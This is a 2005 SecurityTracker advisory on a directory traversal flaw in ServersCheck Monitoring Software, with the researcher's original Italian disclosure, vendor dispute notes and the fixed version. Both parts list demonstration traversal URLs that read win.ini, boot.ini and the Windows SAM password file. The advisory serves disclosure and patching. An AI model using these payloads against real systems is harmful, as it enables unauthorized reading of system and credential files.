SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   ServersCheck Vendors:   ServersCheck
[Vendor Disputes Impact] ServersCheck Lets Remote Authenticated Users Traverse the Directory
SecurityTracker Alert ID:  1014075
SecurityTracker URL:  http://securitytracker.com/id/1014075
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Jun 3 2005
Original Entry Date:  May 29 2005
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.9.0 - 5.10.0
Description:   rgod reported an input validation vulnerability in ServersCheck. A remote authenticated user can view files on the target system. [Editor's note: The vendor has disputed the security impact of this issue.]

The ServersCheck Monitoring Software does not properly validate user-supplied requests. A remote authenticated user can supply a specially crafted URL containing directory traversal characters to view files on the target system.

Some demonstration exploit URLs are provided:

http://[target]:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://[target]:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
http://[target]:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://[target]:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://[target]:1272/../../../../../../../../../boot.ini
http://[target]:1272/../../../../../../../../boot.ini
http://[target]:1272/../../../../boot.ini

[Editor's note: The vendor has disputed the security impact of this bug. The vendor confirms the system behavior and has issued a fix, but notes that the single user of the administrative interface has system administration privileges on the underlying operating system and can view or modify the files that are disclosed via the directory traversal bug. We are reviewing the matter and will update this alert shortly.]

Impact:   A remote authenticated user can view files on the target system.

[Editor's note: The vendor has indicated that the only remote authenticated user is a person who will also have system administrator privileges at the operating system level on the target system.]

Solution:   The vendor has issued a fixed version (5.10.1).
Vendor URL:  www.serverscheck.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Windows (2000), Windows (2003), Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  serverscheck 5.9 trasversal url bug



*******************************************
Serverscheck trasversal url bug

by rgod at http://rgod.altervista.org

26-05-2005
******************************************


-sito del produttore:

www.serverscheck.com


-versione testata:

Serverscheck Monitoring Software 5.9.0 - 5.10.0


-descrizione del prodotto:

"ServersCheck is a network monitoring, reporting and alerting tool.
It monitors the availability of networked devices and computer systems
(Windows, Unix, Linux, MacOS,...). ServersCheck runs on Windows 2000, 2003
and
XP"



directory trasversal bug - permette a un utente definito dall'amministratore
di navigare all'interno della macchina e procurarsi file di password,


-exploit:

alcuni check con esito positivo:

http://localhost:1272/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
http://localhost:1272/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boo
t.ini
http://localhost:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
http://localhost:1272/.../.../.../.../.../.../.../.../.../boot.ini
http://localhost:1272/../../../../../../../../../boot.ini
http://localhost:1272/../../../../../../../../boot.ini
http://localhost:1272/../../../../boot.ini
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC